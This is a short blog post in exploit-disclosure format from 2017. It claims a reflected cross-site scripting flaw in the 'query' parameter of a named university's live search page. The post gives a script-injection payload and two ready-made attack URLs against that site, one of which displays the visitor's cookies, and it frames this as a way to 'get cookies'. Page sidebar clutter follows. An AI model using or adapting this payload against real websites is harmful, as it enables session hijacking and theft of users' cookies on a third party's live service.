Saturday, 22 April 2017
In the name of god
--------------------------
Exploit Title :
-------------------
London's Global University Cross-Site-Scripting Vulnerability
Exploit Author :
---------------------
4TT4CK3R
Date :
----------
2017/Apr/21
HomePage :
------------------
https://www.ucl.ac.uk
Vendor Page :
---------------------
https://www.ucl.ac.uk/maps/index.php
Parameter Name :
--------------------------
query
Description :
------------------
Our Script is :
""/>"certi"<script>alert("4TT4CK3R")</script>"/certi"
ok. Now we can insert this script for query parameter.
we will have :
http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(%224TT4CK3R%22)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go
and you can get cookies :
http://search2.ucl.ac.uk/s/search.html?query=%22%22/%3E%22certi%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22/certi%22&collection=website-meta&profile=_website&tab=websites&submit=Go
ok this university have a Cross-site-Scripting vulnerability!
Subscribe to:
Post Comments (Atom)
Sectoon
Featured post
27 good hacker documentary
In the eyes of most people, a group of hackers usually extremely boring nothing interesting people, and that if only the computer code in ...
Blog Archive
Top certifications to plan in 2018 ?
0 comments:
Post a Comment